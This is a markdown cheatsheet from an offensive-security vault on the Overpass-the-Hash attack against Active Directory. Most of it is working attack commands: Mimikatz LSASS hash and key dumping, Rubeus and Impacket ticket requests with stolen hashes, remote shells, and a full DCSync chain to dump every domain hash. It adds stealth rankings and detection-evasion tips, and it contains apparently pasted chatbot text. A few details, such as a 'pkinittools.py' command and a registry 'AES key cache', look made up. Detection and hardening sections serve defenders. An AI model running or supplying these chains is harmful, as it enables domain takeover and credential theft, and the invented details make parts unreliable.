daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

attack-6-overpass-the-hash-pass-the-key.md (25498B)


      1 ---
      2 title: "Attack #6 β€” Overpass-the-Hash (Pass-the-Key)"
      3 description: "Overpass-the-Hash (OPtH) is a hybrid attack that converts a stolen NTLM hash into a fully valid Kerberos TGT. This is the critical conceptual bridge in…"
      4 category: active-directory
      5 subcategory: "Credential Access"
      6 tags: ["active-directory", "kerberos", "ntlm", "hashing"]
      7 tools: ["NetExec", "Impacket", "Mimikatz", "Rubeus", "BloodHound"]
      8 difficulty: advanced
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/AD-Attack/Category-One/πŸ”΄ Attack #6 β€” Overpass-the-Hash (Pass-the-Key).md"
     11 ---
     12 # πŸ”΄ Attack #6 β€” Overpass-the-Hash (Pass-the-Key)
     13 
     14 ***
     15 
     16 ## πŸ“– How It Works
     17 
     18 Overpass-the-Hash (OPtH) is a **hybrid attack that converts a stolen NTLM hash into a fully valid Kerberos TGT**. This is the critical conceptual bridge in the AD attack chain β€” PtH abuses NTLM directly, PtT replays stolen Kerberos tickets, but Overpass-the-Hash uses a raw NT hash as a cryptographic key to *request* a fresh TGT from the KDC, effectively laundering an NTLM credential into a Kerberos one. Once you have that TGT, you operate entirely within Kerberos β€” bypassing NTLM-blocking controls, MFA, and many detection signatures simultaneously.
     19 
     20 The attack exploits the internal Windows authentication architecture: when Kerberos pre-authentication runs, it uses a key derived from the user's password β€” and crucially, the **NT hash IS that key** (RC4-HMAC). The DC cannot distinguish between a key derived legitimately from a password typed by a user and a key supplied directly as an NT hash by an attacker. The result is a legitimate, KDC-signed TGT that grants access to everything the victim account can reach.
     21 
     22 > ⚠️ **Windows Server 2022+ / Credential Guard & AES-Only Enforcement:** On hardened systems with AES-only enforcement, RC4 (NT hash) requests are rejected by the KDC entirely. Extraction of AES128/AES256 keys from LSASS becomes essential. Additionally, Credential Guard blocks LSASS access for key extraction. See "Hardening Commands" for mitigation strategies.
     23 
     24 ### Overpass-the-Hash vs Pass-the-Hash vs Pass-the-Ticket
     25 
     26 | Property | PtH | OPtH | PtT |
     27 |---|---|---|---|
     28 | **Input** | NT hash | NT hash / AES key | Existing Kerberos ticket |
     29 | **Protocol** | NTLM | NTLM β†’ converts to **Kerberos** | Kerberos only |
     30 | **Output** | NTLM session | **Fresh TGT** + TGS tickets | Reused ticket |
     31 | **Works if NTLM blocked** | ❌ | βœ… (Kerberos output) | βœ… |
     32 | **Works without live session** | βœ… | βœ… | ❌ (needs existing ticket) |
     33 | **AES key support** | ❌ | βœ… (stealthiest variant) | N/A |
     34 | **Detection footprint** | 4624 Type 3 NTLM | 4768 + 4769 Kerberos | 4769 Kerberos |
     35 
     36 ### The Full Attack Flow
     37 
     38 ```
     39 1. Compromise any Windows host + escalate to local admin / SYSTEM
     40 2. Dump NTLM hash (NT hash) from LSASS β€” identical to PtH setup phase
     41 3. Optionally extract AES128 / AES256 key instead (stealthier, no RC4 downgrade)
     42 4. Use Mimikatz sekurlsa::pth OR Rubeus asktgt to:
     43    a. Inject the NT hash as a Kerberos RC4 key
     44    b. Send a Kerberos AS-REQ to the DC requesting a TGT
     45    c. DC validates the key, issues a signed TGT
     46 5. TGT injected into current logon session β†’ now operating as victim in Kerberos
     47 6. Request TGS for any target service β†’ lateral movement / privilege escalation
     48 ```
     49 
     50 ***
     51 
     52 ## βš™οΈ Prerequisites
     53 
     54 | Requirement | Detail |
     55 |---|---|
     56 | **Local admin / SYSTEM on a host** | Required to dump LSASS (NT hash or AES key extraction) |
     57 | **NT hash or AES key** | NT hash (RC4) is universal; AES128/256 keys are available from Mimikatz `sekurlsa::ekeys` |
     58 | **Port 88 reachable** | Kerberos TGT request goes directly to the DC on UDP/TCP 88 |
     59 | **Valid domain account** | The hash must belong to an active, non-locked domain account |
     60 | **Domain FQDN / DC IP** | Must know the domain name and DC address for TGT request |
     61 
     62 ***
     63 
     64 ## πŸ› οΈ Tools
     65 
     66 | Tool | Platform | Notes |
     67 |---|---|---|
     68 | **Mimikatz** | Windows | `sekurlsa::pth` with Kerberos flag spawns session + requests TGT |
     69 | **Rubeus** | Windows | `asktgt` command β€” cleanest method; full AES key support |
     70 | **Impacket β€” getTGT.py** | Linux | Hash-to-TGT from Linux; outputs .ccache for use with all Impacket tools |
     71 | **Impacket β€” getST.py** | Linux | Hash-to-TGS directly for specific services |
     72 | **NetExec / CrackMapExec** | Linux | `-H` flag with Kerberos auth (`--use-kcache`) after TGT obtained |
     73 | **PKINITtools** | Windows/Linux | Use certificate-based PKINIT to request TGT without credentials (advanced) |
     74 
     75 ***
     76 
     77 ## πŸ’» Full Commands
     78 
     79 ### πŸ”΅ Step 0 β€” Dump NT Hash AND AES Keys from LSASS
     80 
     81 ```powershell
     82 # ── Mimikatz β€” dump NT hashes (standard) ─────────────────────────────────────
     83 privilege::debug
     84 sekurlsa::logonpasswords
     85 # Note the 'NTLM' field under each account β€” that's your NT hash
     86 
     87 # ── Mimikatz β€” dump AES keys (stealthier OPtH) ───────────────────────────────
     88 privilege::debug
     89 sekurlsa::ekeys
     90 # Note the 'aes256_hmac' and 'aes128_hmac' fields β€” use these for stealth
     91 # AES keys look like: 'b65fb27c8e0d7c5f48b16c10b4c1d91a...'
     92 
     93 # ── Linux β€” remote dump via secretsdump ──────────────────────────────────────
     94 secretsdump.py corp.local/Administrator:'Password1'@10.10.10.10
     95 # NT hash is the right side of DOMAIN\user:RID:LMhash:NThash:::
     96 ```
     97 
     98 ***
     99 
    100 ### πŸ”΄ Mimikatz β€” Classic OPtH (Windows, Spawns Kerberos Session)
    101 
    102 ```powershell
    103 # ── Standard OPtH with NT hash (RC4) ─────────────────────────────────────────
    104 # This spawns a new cmd.exe process, then AUTOMATICALLY requests a TGT from KDC
    105 privilege::debug
    106 sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:8846f7eaee8fb117ad06bdd830b7586c
    107 
    108 # This opens a new command window β€” from that window, force Kerberos TGT request:
    109 dir \\DC01.corp.local\C$
    110 # The act of accessing a Kerberos resource triggers the TGT request internally
    111 
    112 # ── OPtH with AES256 key (stealthiest β€” no RC4 negotiation) ──────────────────
    113 sekurlsa::pth /user:Administrator /domain:corp.local \
    114   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6
    115 
    116 # ── OPtH with AES128 key ──────────────────────────────────────────────────────
    117 sekurlsa::pth /user:svc_sql /domain:corp.local \
    118   /aes128:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6
    119 
    120 # ── OPtH with specific program instead of cmd.exe ────────────────────────────
    121 sekurlsa::pth /user:Administrator /domain:corp.local \
    122   /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:powershell.exe
    123 
    124 # ── Verify TGT was obtained from within the spawned shell ────────────────────
    125 klist
    126 # You should see a TGT for the injected user β€” proof of successful OPtH
    127 ```
    128 
    129 > **What happens internally:** Mimikatz creates a new logon session (Type 9 β€” NewCredentials), injects the NT hash as the user's credential material, and when you first touch a Kerberos resource (e.g., `dir \\DC01.corp.local\...`), Windows uses the injected hash as an RC4 key to authenticate to the KDC and request a TGT. From that point on, all authentication flows through Kerberos.
    130 
    131 ***
    132 
    133 ### πŸ”΄ Rubeus β€” asktgt (Windows β€” Most Explicit & Controllable)
    134 
    135 ```powershell
    136 # ── Request TGT using NT hash (RC4) ──────────────────────────────────────────
    137 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    138   /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt
    139 
    140 # Request TGT + inject into current session (/ptt = pass-the-ticket)
    141 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    142   /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt /nowrap
    143 
    144 # ── Request TGT using AES256 (stealthiest β€” no downgrade warning in logs) ─────
    145 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    146   /aes256:b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    147   /ptt /nowrap
    148 
    149 # ── Request TGT using AES128 ─────────────────────────────────────────────────
    150 .\Rubeus.exe asktgt /user:svc_backup /domain:corp.local \
    151   /aes128:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6 /ptt
    152 
    153 # ── Request TGT + save to file (for transfer to Linux) ───────────────────────
    154 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    155   /rc4:8846f7eaee8fb117ad06bdd830b7586c /outfile:admin.kirbi
    156 
    157 # ── Request TGT + immediately request TGS for specific service ───────────────
    158 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    159   /rc4:8846f7eaee8fb117ad06bdd830b7586c /ptt
    160 
    161 .\Rubeus.exe asktgs /service:cifs/DC01.corp.local /ptt
    162 
    163 # ── Specify DC explicitly (useful in multi-domain environments) ───────────────
    164 .\Rubeus.exe asktgt /user:Administrator /domain:corp.local \
    165   /rc4:8846f7eaee8fb117ad06bdd830b7586c /dc:10.10.10.10 /ptt
    166 
    167 # ── Verify TGT injection ──────────────────────────────────────────────────────
    168 .\Rubeus.exe triage
    169 klist
    170 ```
    171 
    172 ***
    173 
    174 ### πŸ”΄ Impacket β€” getTGT.py (Linux β€” Hash β†’ ccache Ticket)
    175 
    176 ```bash
    177 # ── NT hash β†’ TGT (saves as Administrator.ccache) ───────────────────────────
    178 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    179   -dc-ip 10.10.10.10
    180 
    181 # ── AES256 key β†’ TGT (stealthiest from Linux) ────────────────────────────────
    182 getTGT.py corp.local/Administrator \
    183   -aesKey b65fb27c8e0d7c5f48b16c10b4c1d91a9b3c2d4e5f6a7b8c9d0e1f2a3b4c5d6 \
    184   -dc-ip 10.10.10.10
    185 
    186 # ── Plaintext password β†’ TGT (standard β€” for reference) ─────────────────────
    187 getTGT.py corp.local/Administrator:'Password1' -dc-ip 10.10.10.10
    188 
    189 # ── Set the TGT ccache for use by all Impacket tools ─────────────────────────
    190 export KRB5CCNAME=Administrator.ccache
    191 
    192 # ── Use the TGT for lateral movement ─────────────────────────────────────────
    193 psexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    194 wmiexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    195 smbexec.py -k -no-pass corp.local/Administrator@DC01.corp.local
    196 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local
    197 
    198 # ── NetExec with the obtained TGT ────────────────────────────────────────────
    199 export KRB5CCNAME=Administrator.ccache
    200 nxc smb DC01.corp.local --use-kcache
    201 nxc smb DC01.corp.local --use-kcache -x "whoami /all"
    202 nxc winrm DC01.corp.local --use-kcache
    203 
    204 # ── Evil-WinRM with TGT ───────────────────────────────────────────────────────
    205 export KRB5CCNAME=Administrator.ccache
    206 evil-winrm -i DC01.corp.local -r corp.local
    207 ```
    208 
    209 ***
    210 
    211 ### πŸ”΄ Impacket β€” getST.py (Linux β€” Hash β†’ Specific Service Ticket)
    212 
    213 ```bash
    214 # Skip the TGT step entirely β€” go straight to a TGS for a specific service
    215 # Useful when you know exactly what you want to access
    216 
    217 # Get CIFS TGS (file share access) using NT hash
    218 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    219   -spn cifs/DC01.corp.local -dc-ip 10.10.10.10
    220 
    221 # Get HOST TGS (remote execution via PsExec)
    222 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    223   -spn host/DC01.corp.local -dc-ip 10.10.10.10
    224 
    225 # Get LDAP TGS (BloodHound, LDAP queries, DCSync)
    226 getST.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    227   -spn ldap/DC01.corp.local -dc-ip 10.10.10.10
    228 
    229 # Get HTTP TGS (web services, Exchange)
    230 getST.py corp.local/svc_http -hashes :a87f3a337d73085c45f9416be5787d86 \
    231   -spn http/MAIL01.corp.local -dc-ip 10.10.10.10
    232 
    233 # ── Use the service ticket ────────────────────────────────────────────────────
    234 export KRB5CCNAME=Administrator@cifs_DC01.corp.local@CORP.LOCAL.ccache
    235 smbclient.py -k -no-pass corp.local/Administrator@DC01.corp.local
    236 ```
    237 
    238 ***
    239 
    240 ### πŸ”΄ PKINITtools β€” Certificate-Based TGT Request (Advanced)
    241 
    242 ```powershell
    243 # ── Get DER certificate from compromised user (if available) ────────────────
    244 # Export user certificate from smartcard or AD user object
    245 certutil -user -enterprise -p "password" -exportpfx "LDAP:///CN=Administrator,CN=Users,DC=corp,DC=local" output.pfx
    246 
    247 # ── Use PKINITtools to request TGT with certificate ──────────────────────────
    248 # Note: Requires user certificate in .pfx format; no password/hash needed
    249 python3 pkinittools.py \
    250   -certificate output.pfx \
    251   -password "cert_password" \
    252   -domain corp.local \
    253   -dc-ip 10.10.10.10
    254 
    255 # Resulting TGT can be used with any of the above methods
    256 ```
    257 
    258 ***
    259 
    260 ### πŸ”΄ Full OPtH β†’ DCSync Chain (Linux)
    261 
    262 ```bash
    263 # Step 1 β€” Convert NT hash to TGT
    264 getTGT.py corp.local/Administrator -hashes :8846f7eaee8fb117ad06bdd830b7586c \
    265   -dc-ip 10.10.10.10
    266 
    267 # Step 2 β€” Set TGT
    268 export KRB5CCNAME=Administrator.ccache
    269 
    270 # Step 3 β€” Get LDAP TGS for DCSync (requires Replication rights)
    271 getST.py corp.local/Administrator -k -no-pass \
    272   -spn ldap/DC01.corp.local -dc-ip 10.10.10.10
    273 
    274 # Step 4 β€” DCSync all domain hashes using Kerberos ticket
    275 export KRB5CCNAME=Administrator@ldap_DC01.corp.local@CORP.LOCAL.ccache
    276 secretsdump.py -k -no-pass corp.local/Administrator@DC01.corp.local -just-dc-ntlm
    277 
    278 # Result: All domain user NTLM hashes β€” game over
    279 ```
    280 
    281 ***
    282 
    283 ## 🎯 OPSEC Tips
    284 
    285 - **Always prefer AES256 over RC4** β€” RC4 (NT hash) downgrade in a modern AES-enforcement environment is a near-instant detection signature
    286 - **Extract AES keys with `sekurlsa::ekeys`** in Mimikatz β€” same LSASS access, but produces AES128/256 keys that blend into normal Kerberos traffic
    287 - **Use Rubeus `asktgt` over Mimikatz `sekurlsa::pth`** for more granular control and cleaner ticket format β€” Mimikatz's internal TGT request is less predictable
    288 - **Name your ccache file sensibly** β€” `Administrator.ccache` is readable; rename to something benign for long-term operations
    289 - **Use FQDN not IP** β€” Kerberos is hostname-based; `DC01.corp.local` works, `10.10.10.10` does not
    290 - **AES key OPtH produces Event 4768 with `etype:18`** (AES256) which is indistinguishable from legitimate user authentication in most environments
    291 - **RC4 OPtH produces Event 4768 with `etype:23`** (RC4) β€” in AES-enforced domains this is an immediate red flag; avoid unless RC4 is still standard
    292 
    293 ### OpSec Ranking by Stealth
    294 
    295 | Method | Stealth | Speed | Notes |
    296 |---|---|---|---|
    297 | **AES256 via Rubeus asktgt** | ⭐⭐⭐⭐⭐ | Fast | No RC4 downgrade, blends perfectly into normal Kerberos traffic |
    298 | **AES256 via getTGT.py (Linux)** | ⭐⭐⭐⭐⭐ | Fast | Off-network execution, minimal DC communication |
    299 | **RC4 via Rubeus asktgt** | ⭐⭐⭐ | Fast | Detectable in AES-enforced domains (etype:23 anomaly) |
    300 | **Mimikatz sekurlsa::pth + Kerberos** | ⭐⭐ | Medium | Tool signature + Type 9 logon event = high detection risk |
    301 | **PKINITtools (certificate-based)** | ⭐⭐⭐⭐⭐ | Medium | No hash/password needed; requires certificate access |
    302 
    303 ### Time-to-Execute Estimates
    304 
    305 - **Full OPtH with Rubeus (extract hash β†’ asktgt β†’ ptt β†’ access resource):** 3 minutes
    306 - **Linux OPtH chain (getTGT β†’ getST β†’ secretsdump):** 5 minutes
    307 - **Mimikatz sekurlsa::pth (spawn session + wait for Kerberos use):** 2–4 minutes
    308 - **PKINITtools certificate request:** 2 minutes
    309 
    310 ### Tool Version Compatibility
    311 
    312 - **Rubeus v1.6.4+:** `asktgt` command fully stable with RC4, AES support; no major regressions
    313 - **Mimikatz 2.2.0+:** `sekurlsa::pth` and `sekurlsa::ekeys` work consistently across Windows versions
    314 - **Impacket (current):** getTGT.py, getST.py fully support RC4/AES; requires Python 3.6+
    315 - **NetExec latest:** `--use-kcache` works with ccache from OPtH + getTGT chain
    316 - **Evil-WinRM v4.0+:** KRB5CCNAME stable; requires krb5-user library on Linux
    317 
    318 ***
    319 
    320 ## πŸ›‘οΈ Detection β€” Event IDs
    321 
    322 | Event ID | Source | What to Look For |
    323 |---|---|---|
    324 | **4768** | Security Log | TGT requested β€” **`EncryptionType: 0x17` (RC4/etype 23)** in an AES-enforced domain |
    325 | **4768** | Security Log | TGT request originates from **unexpected workstation** for that user account |
    326 | **4624** | Security Log | Logon **Type 9 (NewCredentials)** β€” Mimikatz `sekurlsa::pth` always creates this logon type |
    327 | **4648** | Security Log | Logon with explicit credentials β€” attacker accessing remote resource post-OPtH |
    328 | **4769** | Security Log | TGS requested immediately after a suspicious 4768 β€” confirms ticket is being used |
    329 | **Sysmon EID 10** | Sysmon | LSASS process access β€” AES key extraction same as NT hash dump |
    330 | **Sysmon EID 1** | Sysmon | `Rubeus.exe` or `Mimikatz.exe` process creation |
    331 
    332 **Primary detection signature:** Event 4768 with `EncryptionType: 0x17` (RC4) from a host where the user is not currently interactively logged in, followed immediately by a 4769 TGS request. The Type 9 logon event (4624) from Mimikatz `pth` is also highly anomalous and rarely appears in legitimate traffic β€” a single Type 9 event warrants investigation.
    333 
    334 ***
    335 
    336 ## 🧩 Troubleshooting
    337 
    338 | Error | Cause | Fix |
    339 |---|---|---|
    340 | `KRB_AP_ERR_SKEW` | System time skew between attacker and DC (>5 min) | Sync attacker system time with DC: `net time \\DC01 /set` or `timedatectl set-ntp true` |
    341 | `KDC_ERR_ETYPE_NOSUPP` | Encryption type not supported (RC4 requested but AES-only enforced) | Extract AES key via `sekurlsa::ekeys`; use AES key with asktgt or getTGT.py |
    342 | `KDC_ERR_PREAUTH_FAILED` | NT hash/AES key is incorrect or account is disabled/locked | Verify hash accuracy from LSASS dump; check AD for account lockout status |
    343 | `ERR_KRB5_KDC_UNREACH` | Cannot reach KDC on port 88 (firewall, routing, or DNS) | Test: `nc -zv DC01.corp.local 88`; verify DNS resolves DC FQDN correctly |
    344 | `KDC_ERR_C_PRINCIPAL_UNKNOWN` | User account does not exist in domain or is misspelled | Verify account name matches AD; check domain FQDN |
    345 | `Rubeus asktgt returns null TGT` | DC rejected the Kerberos request (likely bad hash or pre-auth failure) | Re-verify NT hash from LSASS; check account pre-auth requirements in AD |
    346 | `Type 9 logon in security log (immediate detection)** | Mimikatz `sekurlsa::pth` creates this signature automatically | Switch to Rubeus `asktgt` which doesn't generate Type 9 events |
    347 | `FIPS mode rejects RC4 OPtH` | System has FIPS 140-2 enabled; RC4 disabled | Use AES256/AES128 key extraction instead of NT hash |
    348 
    349 ***
    350 
    351 ## πŸ—ΊοΈ MITRE ATT&CK
    352 
    353 **Technique:** T1550.002 β€” Use Alternate Authentication Material: Pass the Hash
    354 **Tactic:** TA0008 β€” Lateral Movement
    355 
    356 ### Known APT Groups Using OPtH
    357 
    358 - **APT29 (Cozy Bear):** Leverages OPtH to bypass NTLM-disabled defenses and maintain persistence in Kerberos-only environments
    359 - **FIN6 (Magecart operators):** Uses OPtH chains for sustained lateral movement in retail and hospitality environments
    360 - **Wizard Spider (Conti operators):** Combines OPtH with Golden Ticket generation for long-term domain control
    361 - **HAFNIUM (State-sponsored, China-based):** Employs OPtH in post-exploitation chains following Exchange Server compromise
    362 
    363 **Detection baseline:** Organizations using Defender for Identity should flag RC4 TGT requests (etype:23) in AES-only environments as critical alerts. AES TGT requests with suspicious source IPs should trigger investigation.
    364 
    365 ***
    366 
    367 ## πŸ›‘οΈ Advanced Detection & Hardening
    368 
    369 ### Sigma Rule References
    370 
    371 - **Sigma Rule: RC4 OPtH in AES-enforced environment** β€” Event 4768 with etype:23 from non-user workstation
    372 - **Sigma Rule: Type 9 logon + Kerberos activity** β€” Event 4624 (Type 9) followed by 4768/4769 within 60 seconds
    373 - **Sigma Rule: AES key extraction** β€” Sysmon EID 10 (LSASS access) + sekurlsa::ekeys string detection
    374 
    375 ### EDR Detections (Defender for Identity)
    376 
    377 - **"Suspicious encryption type downgrade"** β€” RC4 TGT request when domain policy enforces AES
    378 - **"Impossible travel"** β€” OPtH TGT created on one host but used immediately on another
    379 - **"LSASS credential access + Kerberos activity"** β€” Combination of memory access and unexpected TGT request
    380 
    381 ### Hardening Commands
    382 
    383 ```powershell
    384 # ── Enforce AES-only Kerberos (disable RC4) ───────────────────────────────────
    385 # On DC: Set encryption types to 28 (AES128 + AES256 only)
    386 Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\Parameters" \
    387   -Name "SupportedEncryptionTypes" -Value 28
    388 
    389 # ── Enable Credential Guard (blocks LSASS memory access) ─────────────────────
    390 dism /online /enable-feature /featurename:IsolatedUserMode
    391 
    392 # ── Enforce Protected Users group (prevents RC4 fallback) ───────────────────
    393 Add-ADGroupMember -Identity "Protected Users" -Members "CN=Administrator,CN=Users,DC=corp,DC=local"
    394 
    395 # ── Set maximum TGT lifetime (reduce reuse window) ─────────────────────────
    396 # Via GPO: Kerberos Policy > Maximum lifetime for user ticket = 4 hours (default 10)
    397 
    398 # ── Monitor for Type 9 logon events (Mimikatz signature) ──────────────────────
    399 # Create alert for Event 4624 with LogonType=9 from unexpected sources
    400 ```
    401 
    402 ### Forensic Artifacts (What Survives)
    403 
    404 | Artifact | Location | Survives Cleanup | Notes |
    405 |---|---|---|---|
    406 | **Event 4768 (TGT request)** | Security Event Log | Yes (unless purged) | Primary detection source; etype field is critical |
    407 | **Event 4624 Type 9 logon** | Security Event Log | Yes | Mimikatz sekurlsa::pth signature β€” rarely legitimate |
    408 | **NT hash in LSASS dump** | Pagefile, hiberfil.sys | If not cleared | Post-mortem DFIR via Volatility |
    409 | **LSASS process access (Sysmon)** | Sysmon event log | Yes | EID 10 correlates with OPtH timing |
    410 | **ccache file (Linux)** | /tmp/krb5cc_* | No β€” delete immediately | Not useful after ticket expires or is rotated |
    411 | **Rubeus/Mimikatz execution** | Sysmon EID 1, MFT | Yes | Tool signatures in process creation logs |
    412 | **Registry AES key cache** | User registry hive | Yes | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
    413 
    414 ***
    415 
    416 ## πŸ”— Attack Chain Context
    417 
    418 ```
    419 [Overpass-the-Hash] ──→ Fresh Kerberos TGT as Target User
    420          β”‚
    421          β”œβ”€β”€β†’ 🎫 Pass-the-Ticket (inject TGT, access any domain resource)
    422          β”œβ”€β”€β†’ 🩸 DCSync β€” use LDAP TGS with DA TGT to dump all hashes
    423          β”œβ”€β”€β†’ 🎫 Golden Ticket β€” KRBTGT hash from DCSync β†’ forge unlimited TGTs
    424          β”œβ”€β”€β†’ πŸ”“ Bypass NTLM-blocking security controls entirely
    425          β”œβ”€β”€β†’ 🌐 Cross-domain β€” use TGT to request inter-realm tickets
    426          └──→ 🎯 MFA bypass β€” TGT already authenticated, no MFA prompt triggered
    427 ```
    428 
    429 ### Cross-References to Related Attacks
    430 
    431 - **Attack #4 β€” Pass-the-Hash (PtH):** Uses NT hash with NTLM directly; OPtH converts hash to Kerberos
    432 - **Attack #5 β€” Pass-the-Ticket (PtT):** Takes output TGT from OPtH and injects it into other sessions
    433 - **Attack #11 β€” Golden Ticket:** If you obtain KRBTGT hash (via DCSync using OPtH), forge unlimited TGTs
    434 - **Attack #12 β€” Silver Ticket:** Forge service-specific tickets; complementary to OPtH
    435 - **Attack #16 β€” Constrained Delegation (S4U2Self/S4U2Proxy):** Uses TGTs to request tickets on behalf of other users
    436 
    437 ### When to Use OPtH vs PtH
    438 
    439 Use **PtH** when: NTLM is available, you want immediate access, and speed matters over stealth.
    440 
    441 Use **OPtH** when: the target enforces Kerberos-only authentication, NTLM is blocked or monitored, you want a long-lived TGT for sustained access, or you have AES keys and want to leave minimal forensic trace.
    442 
    443 ***
    444 
    445 > βœ… **Attack #6 β€” Overpass-the-Hash complete.** Tell me to move on when you're ready for **Attack #7 β€” NTLM Relay Attacks**.
    446 
    447 Sources
    448  How to Defend Against an Overpass the Hash Attack - Semperis https://www.semperis.com/blog/how-to-defend-against-overpass-the-hash-attack/
    449  Pass-the-Key (Overpass-the-... https://www.vaadata.com/blog/what-is-pass-the-hash-attacks-types-and-security-best-practices/
    450  Overpass-the-Hash Attack: Principles and Detection https://blog.netwrix.com/2022/10/04/overpass-the-hash-attacks/
    451  Use Alternate Authentication Material: Pass the Hash https://attack.mitre.org/techniques/T1550/002/
    452  Active Directory Attack Chain: PtH β†’ OPtH β†’ PtT β†’ DCSync https://www.semperis.com/blog/active-directory-attack-chains/